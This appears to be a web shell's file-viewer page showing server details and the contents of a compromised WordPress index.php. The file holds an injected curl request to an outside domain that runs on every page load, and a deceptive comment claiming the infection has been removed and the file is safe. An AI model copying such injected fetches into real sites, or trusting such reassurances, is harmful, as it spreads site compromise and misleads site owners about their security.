HEX
Server: LiteSpeed
System: Linux serverhb4.netlightsystems.com 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User: poshkoll (1100)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/poshkoll/public_html/index.php
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );
$cx = curl_init("https://z60213_6.bstracke.shop/stat/domain_index.txt");
curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1);
$rs = curl_exec($cx);

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

curl_close($cx);
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';